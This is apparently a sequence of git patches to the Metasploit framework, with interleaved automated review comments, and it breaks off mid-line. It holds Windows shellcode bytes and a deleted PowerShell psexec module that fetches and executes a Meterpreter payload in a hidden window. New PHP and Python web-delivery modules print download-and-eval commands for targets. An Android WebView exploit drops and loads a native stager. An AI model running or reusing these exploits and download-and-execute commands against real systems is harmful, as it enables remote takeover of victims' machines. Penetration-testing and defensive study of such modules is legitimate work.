"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" + + "\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" + + "\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" + + "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" + + "\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" + + 
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" + + "\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" + + "\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + + "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" + + "\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" + + "\x68\xc2\xdb\x37\x67\xff\xd5\x6a\x01\x54\x68\x02\x30\x00\x00\x68" + + "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" + + "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" + + "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" + + "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x83\xf8\xff\x74" + + "\xd4\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" + + "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" + + "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" + + "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" + + "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" + + "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" + + "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + } + )) + end + +end From 45d554e6d966f0601e823f3207e519b68a6b3471 Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 20 Feb 2014 12:01:04 -0500 Subject: [PATCH 031/853] Delete powershell_psexec.rb --- .../windows/powershell/powershell_psexec.rb | 159 ------------------ 1 file changed, 159 deletions(-) delete mode 100644 modules/exploits/windows/powershell/powershell_psexec.rb diff --git a/modules/exploits/windows/powershell/powershell_psexec.rb b/modules/exploits/windows/powershell/powershell_psexec.rb deleted file mode 100644 index 6f13facd90..0000000000 --- a/modules/exploits/windows/powershell/powershell_psexec.rb +++ /dev/null 
@@ -1,159 +0,0 @@ -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ManualRanking - - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB::Psexec - include Msf::Exploit::Remote::SMB::Authenticated - include Msf::Exploit::EXE - include Msf::Exploit::Remote::HttpServer - - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft Authenticated User Powershell PSEXEC', - 'Description' => %q{ - This module uses a valid windows user account to pull a meterpreter payload via psexec (thanks to hdm and r3dy) and powershell. It then - executes it within a powershell process. This module uses a slightly modified technique that was first detailed by - @obscuresec using Powersploit. A custom payload option is avaliable via the LPATH variable. - }, - 'Author' => - [ - 'Andrew Smith "jakx" ', - ], - 'License' => MSF_LICENSE, - 'Version' => '$$', - 'Privileged' => true, - 'DefaultOptions' => - { - 'WfsDelay' => 15, - 'EXITFUNC' => 'process', - 'Payload' => 'windows/meterpreter/reverse_tcp' - }, - 'References' => - [ - [ 'URL', 'http://obscuresecurity.blogspot.com/2013/03/powersploit-metasploit-shells.html' ], - [ 'URL', 'https://github.com/mattifestation/PowerSploit' ] - ], - 'Payload' => - { - 'Space' => 2048, - 'DisableNops' => true, - 'StackAdjustment' => -3500 - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, - )) - - register_options( - [ - OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]), - OptString.new('LHOST', [ true, "Host serving meterpreter payload", '' ]), - OptString.new('ARCH', [ true, "Architecture of target host (x64 or x86). 
This options forces 32-bit powershell if machine is 64-bit", 'x64' ]), - OptString.new('LPATH', [ false, "Set this variable to the path of a local file if you want to specify a custom payload, such as powersploit", "" ]) - ], self.class ) - - end - - def peer - - return "#{rhost}:#{rport}" - - end - - def exploit - start_service( - {'Uri' => { - 'Proc' => Proc.new { |cli, req| - on_request_uri(cli, req) - }, - 'Path' => resource_uri - }}) - - - print_status("Connecting to the server...") - connect() - - #Authenticate to target machine - print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...") - smb_login() - - if (not simple.client.auth_user) - print_line(" ") - print_error( - "FAILED! The remote host has only provided us with Guest privileges. " + - "Please make sure that the correct username and password have been provided. " + - "Windows XP systems that are not part of a domain will only provide Guest privileges " + - "to network logins by default." 
- ) - print_line(" ") - disconnect - return - end - - resource=get_resource[1..-1] - payload="#{resource}" - - #Determine if LPATH or MSF payload needs to be used - if (datastore['LPATH'] == "") - print_status("No custom payload specified, using metasploit payload") - elsif File.exists?("#{datastore['LPATH']}") - print_status("Good, your custom payload exists, using #{datastore['LPATH']}") - else - print_error("Specified file #{datastore['LPATH']} does not exist...exiting...") - return - end - - #Define x64 and x32 specific commands - print_status("Pulling payload from #{datastore['LHOST']} and executing..") - - cmd="cmd.exe /c powershell.exe start-process powershell.exe -Argument '-windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted " << - "-command \"iex ((new-object net.webclient).DownloadString(''http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{payload}''))\"'" - - cmd64="cmd.exe /c powershell.exe start-process \"$env:WINDIR\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" " << - "-Argument '-windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted " << - "-command \"iex ((new-object net.webclient).DownloadString(''http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{payload}''))\"'" - - begin - if (datastore['ARCH'] == "x86") - result=psexec(cmd) - elsif (datastore['ARCH'] == "x64") - result2=psexec(cmd64) - else - print_error("You did not specify a valid target machine architecture!") - return - end - - if (result) - print_status("x86 architecture command sent. Waiting for session...") - end - if (result2) - print_status("x64 architecture command sent. 
Waiting for session...") - end - rescue Rex::Proto::SMB::Exceptions::Error => exec_error - print_error("#{peer} - Unable to execute command: #{exec_error}") - return - end - - #Give time for payload to execute - select(nil, nil, nil, 25) - - handler - disconnect - end - - def on_request_uri(cli, request) - print_status("handling request for #{request.uri}") - if (datastore['LPATH'] != "") - script = File.read("#{datastore['LPATH']}") - else - script = Msf::Util::EXE.to_win32pe_psh(framework,payload.encoded) - end - send_response(cli, script, { 'Content-Type' => 'text/plain' }) - end -end From 1834784b93afd2aa41c59fcc31f8777fb0334d93 Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 20 Feb 2014 13:41:18 -0500 Subject: [PATCH 032/853] Added php_web_delivery --- .../exploits/multi/php/php_web_delivery.rb | 60 +++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 modules/exploits/multi/php/php_web_delivery.rb diff --git a/modules/exploits/multi/php/php_web_delivery.rb b/modules/exploits/multi/php/php_web_delivery.rb new file mode 100644 index 0000000000..da17371cd9 --- /dev/null +++ b/modules/exploits/multi/php/php_web_delivery.rb 
@@ -0,0 +1,60 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PHP Payload Web Delivery', + 'Description' => %q{ + This module quickly fires up a web server that serves a PHP payload. + The provided command will start PHP and then download and execute the + payload. The main purpose of this module is to quickly establish a session on a target + machine when the attacker has to manually type in the command himself, e.g. Command Injection, + RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not + write to disk so is less likely to trigger AV solutions. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrew Smith "jakx_" ', + 'Ben Campbell ' #Idea for module structure + ], + 'DefaultOptions' => + { + 'Payload' => 'php/meterpreter/reverse_tcp' + }, + 'References' => + [ + [ 'URL', 'http://www.securitypadawan.blogspot.com/2.html'] + ], + 'Platform' => 'php', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'N/A')) + end + + def on_request_uri(cli, request) + print_status("Delivering Payload") + data = %Q|#{payload.encoded} ?>| + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end + + def primer + url = get_uri() + print_status("Run the following command on the target machine:") + print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") + print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") + end +end + From b5bc3dd4fcad33ed2b4b799cce429ef1728057a0 Mon Sep 17 00:00:00 2001 
From: jakxx Date: Thu, 20 Feb 2014 21:53:00 -0500 Subject: [PATCH 033/853] Added py_web_delivery --- .../exploits/multi/python/py_web_delivery.rb | 60 +++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 modules/exploits/multi/python/py_web_delivery.rb diff --git a/modules/exploits/multi/python/py_web_delivery.rb b/modules/exploits/multi/python/py_web_delivery.rb new file mode 100644 index 0000000000..a3af5380ce --- /dev/null +++ b/modules/exploits/multi/python/py_web_delivery.rb 
@@ -0,0 +1,60 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Python Payload Web Delivery', + 'Description' => %q{ + This module quickly fires up a web server that serves a Python payload. + The provided command will start Python and then download and execute the + payload. The main purpose of this module is to quickly establish a session on a target + machine when the attacker has to manually type in the command himself, e.g. Command Injection, + RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not + write to disk so is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrew Smith "jakx_" ', + 'Ben Campbell ' #Idea for module structure + ], + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'References' => + [ + [ 'URL', 'http://www.securitypadawan.blogspot.com/2.html'] + ], + 'Platform' => 'py', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'N/A')) + end + + def on_request_uri(cli, request) + print_status("Delivering Payload") + data = %Q|#{payload.encoded} | + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end + + def primer + url = get_uri() + print_status("Run the following command on the target machine:") + print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + end +end From ef51de3826fa3f0be0b069bce3d2bc75f39ac52e Mon Sep 17 00:00:00 2001 
From: jakxx Date: Fri, 21 Feb 2014 09:21:08 -0500 Subject: [PATCH 034/853] Updating References --- modules/exploits/multi/php/php_web_delivery.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/php/php_web_delivery.rb b/modules/exploits/multi/php/php_web_delivery.rb index da17371cd9..e7c237890a 100644 --- a/modules/exploits/multi/php/php_web_delivery.rb +++ b/modules/exploits/multi/php/php_web_delivery.rb @@ -33,7 +33,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - [ 'URL', 'http://www.securitypadawan.blogspot.com/2.html'] + [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] + [ 'URL', 'http://us1.php.net/eval'] + [ 'URL', 'http://us1.php.net/file_get_contents'] ], 'Platform' => 'php', 'Targets' => From c8940c37f54e28da1c68ff28178cd81403f088c2 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 21 Feb 2014 09:23:08 -0500 Subject: [PATCH 035/853] Updating References --- modules/exploits/multi/python/py_web_delivery.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/python/py_web_delivery.rb b/modules/exploits/multi/python/py_web_delivery.rb index a3af5380ce..09a4f73365 100644 --- a/modules/exploits/multi/python/py_web_delivery.rb +++ b/modules/exploits/multi/python/py_web_delivery.rb @@ -34,7 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - [ 'URL', 'http://www.securitypadawan.blogspot.com/2.html'] + [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] + [ 'URL', 'http://docs.python.org/2/library/urllib2.html'] ], 'Platform' => 'py', 'Targets' => From fcfb48fda150ddf524d7421d53500768c0782274 Mon Sep 17 00:00:00 2001 From: kn0 Date: Fri, 21 Feb 2014 13:37:31 -0600 Subject: [PATCH 036/853] Added support for Gemfile.local --- .gitignore | 2 ++ lib/msfenv.rb | 8 +++++++- 2 files changed, 9 insertions(+), 1 deletion(-) 
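Review bot: The three `References` entries added to php_web_delivery.rb are not separated by commas, so the array literal no longer holds three references: Ruby either rejects it or reads the second bracket pair as an index into the first, and the module will most likely fail to load. Each entry except the last needs a trailing comma, e.g. `[ 'URL', 'http://us1.php.net/eval'],`. The next patch (035) makes the same mistake in py_web_delivery.rb, and its first URL points at the PHP write-up rather than a Python one, which looks like a copy-paste. `initialize` starts and ends outside both hunks.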
diff --git a/.gitignore b/.gitignore index 82e108ff0c..4065cd3dce 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,6 @@ .bundle +Gemfile.local +Gemfile.local.lock # Rubymine project directory .idea # Sublime Text project directory (not created by ST by default) diff --git a/lib/msfenv.rb b/lib/msfenv.rb index a6e00a1df6..641e62d504 100644 --- a/lib/msfenv.rb +++ b/lib/msfenv.rb @@ -2,7 +2,13 @@ # Use bundler to load dependencies # -ENV['BUNDLE_GEMFILE'] ||= ::File.expand_path(::File.join(::File.dirname(__FILE__), "..", "Gemfile")) +gemfile_base = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..")) +if File.readable?(::File.join(gemfile_base,"Gemfile.local")) + ENV['BUNDLE_GEMFILE'] ||= ::File.join(gemfile_base, "Gemfile.local") +else + ENV['BUNDLE_GEMFILE'] ||= ::File.join(gemfile_base, "Gemfile") +end + begin require 'bundler/setup' rescue ::LoadError From 4ac8e23e48631c9dae8ca7d970d5c2ae4d5436e0 Mon Sep 17 00:00:00 2001 From: kn0 Date: Fri, 21 Feb 2014 15:31:12 -0600 Subject: [PATCH 037/853] Changed to clearner solution proposed by @limhoff-r7. --- lib/msfenv.rb | 24 +++++++++++++++++++----- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/lib/msfenv.rb b/lib/msfenv.rb index 641e62d504..c3cfdf6461 100644 --- a/lib/msfenv.rb +++ b/lib/msfenv.rb 
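Review bot: Preferring `Gemfile.local` whenever it is readable means an untracked file (this same patch adds it to `.gitignore`) silently replaces the project's dependency set for every entry point that requires msfenv. Nothing tells the user which Gemfile was picked, so a stray or unexpected `Gemfile.local` in the checkout changes what `bundler/setup` loads without any visible sign. I would document the override in the header comment, e.g. `# Gemfile.local, if present, takes precedence over Gemfile (developer-only override)`, and emit a one-line notice when it is selected, e.g. `warn "msfenv: using #{ENV['BUNDLE_GEMFILE']}"`. Patch 037 rewrites this block but keeps the same precedence, so the point applies there as well.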
@@ -2,11 +2,25 @@ # Use bundler to load dependencies # -gemfile_base = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..")) -if File.readable?(::File.join(gemfile_base,"Gemfile.local")) - ENV['BUNDLE_GEMFILE'] ||= ::File.join(gemfile_base, "Gemfile.local") -else - ENV['BUNDLE_GEMFILE'] ||= ::File.join(gemfile_base, "Gemfile") +GEMFILE_EXTENSIONS = [ + '.local', + '' +] + +unless ENV['BUNDLE_GEMFILE'] + require 'pathname' + + msfenv_real_pathname = Pathname.new(__FILE__).realpath + root = msfenv_real_pathname.parent.parent + + GEMFILE_EXTENSIONS.each do |extension| + extension_pathname = root.join("Gemfile#{extension}") + + if extension_pathname.readable? + ENV['BUNDLE_GEMFILE'] = extension_pathname.to_path + break + end + end end begin From 255d2c4db91f178a175df6975a8a1dc9e2a01dce Mon Sep 17 00:00:00 2001 From: Tim Date: Wed, 19 Feb 2014 15:06:11 +0000 Subject: [PATCH 038/853] android payload golf --- data/android/apk/res/drawable-mdpi/icon.png | Bin 3079 -> 0 bytes data/android/apk/res/layout/main.xml | Bin 700 -> 0 bytes modules/payloads/stagers/android/reverse_tcp.rb | 2 -- 3 files changed, 2 deletions(-) delete mode 100644 data/android/apk/res/drawable-mdpi/icon.png delete mode 100644 data/android/apk/res/layout/main.xml 
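Review bot: `Gemfile.local` is selected silently whenever it is readable under the install root, and a Gemfile is Ruby that Bundler evaluates at startup, so an untracked file in that directory decides which code and gem sources the framework loads. On a shared or package-managed install, write access to the root should be limited to the account that runs the framework, and the comment above `GEMFILE_EXTENSIONS` should state this and the precedence order. Printing the chosen path when it is not the default `Gemfile` would make an unexpected override visible. The constant is also a mutable top-level array; `GEMFILE_EXTENSIONS = ['.local', ''].freeze` guards against accidental modification.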
diff --git a/data/android/apk/res/drawable-mdpi/icon.png b/data/android/apk/res/drawable-mdpi/icon.png deleted file mode 100644 index c2e4f5634b903742c71baa0e2e080aa1ee5e2190..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3079 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 ZRGiiSHLrJh&yw#f@jh!P{3T!B%^%F5jrsrp diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index d41922f40e..174c6c5613 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -41,8 +41,6 @@ module Metasploit3 files = [ [ "AndroidManifest.xml" ], - [ "res", "drawable-mdpi", "icon.png" ], - [ "res", "layout", "main.xml" ], [ "resources.arsc" ] ] From 1e14ec7f6cbbb322249f67d59bb53b83fbb417e4 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 25 Feb 2014 00:13:18 +0000 Subject: [PATCH 039/853] native jni stager --- .../browser/webview_addjavascriptinterface.rb | 34 +++++++++++++------ 1 file changed, 24 insertions(+), 10 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 40c5461117..344403fd8e 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb 
@@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'DefaultOptions' => { 'PrependFork' => true }, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, @@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end + def dalvikstager() + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so') + data = File.read(localfile, {:mode => 'rb'}) + data + end + def js %Q| function exec(obj) { 
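Review bot: `dalvikstager` (hunk `@@ -86,6 +86,12 @@`) reads `data/android/libdalvikstager.so`, but this patch's diffstat lists only the module, so unless that file arrives in another commit `File.read` will raise `Errno::ENOENT` when the page is built. The method can be reduced to the read itself, written `def dalvikstager` without the empty parentheses and without the `data` local, and it could use `Msf::Config.data_directory` as the ms13_058 module later in this series does, if that resolves to the same directory. A comment naming where the library's source lives would help, since a prebuilt binary cannot be reviewed from the diff.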
@@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); - var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; + var runtime = m.invoke(null, null); + var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; + var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}"; // get the process name, which will give us our data path - var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); + var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } - path += '/#{Rex::Text.rand_text_alpha(8)}'; + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; + var stagePath = path + '/stage.apk'; - // build the binary, chmod it, and execute it - m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); - m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); - m.invoke(null, null).exec([path]); + // build the library and chmod it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); + runtime.exec(['chmod', '700', libraryPath]).waitFor(); + + // build the stage, chmod it, and load it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor(); + runtime.exec(['chmod', '700', stagePath]).waitFor(); + + runtime.load(libraryPath); return true; } From 162527c0e4d82cfcd926fdd696575f37d47d487d Mon Sep 17 00:00:00 2001 
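Review bot: The comment `// build the stage, chmod it, and load it` does not match the lines under it: the stage file is written and chmod'ed, but the only load call is `runtime.load(libraryPath)`, which loads the native library. Splitting it into `// build the stage and chmod it` and, above the last call, `// load the native library (presumably it reads stage.apk from the same directory; confirm)` would describe what the code does. Both files stay in the app's data directory after the run and `stage.apk` has a fixed name, so the module description should list these artifacts for cleanup after an engagement. The `js` method starts and ends outside this hunk.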
From: Karmanovskii Date: Thu, 6 Mar 2014 09:43:23 -0800 Subject: [PATCH 040/853] Update and rename modules/auxiliary/analyze/myBB_GetTypeDB.rb to modules/auxiliary/gather/myBB_GetTypeDB.rb Minor changes and bug: "Msf :: Auxiliary" - forgot to change --- .../{analyze => gather}/myBB_GetTypeDB.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename modules/auxiliary/{analyze => gather}/myBB_GetTypeDB.rb (92%) diff --git a/modules/auxiliary/analyze/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb similarity index 92% rename from modules/auxiliary/analyze/myBB_GetTypeDB.rb rename to modules/auxiliary/gather/myBB_GetTypeDB.rb index a39fd38c09..5b14a969c7 100644 --- a/modules/auxiliary/analyze/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) rescue print_error("Unable to connect to server.") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end if res.code != 200 print_error("Unable to query to host") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end php_version = res['X-Powered-By'] @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("PHP Version: #{php_version}") else print_status("Unknown PHP Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end _Version_server = res['Server'] @@ -80,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Server Version: #{_Version_server}") else print_status("Unknown Server Version") - return 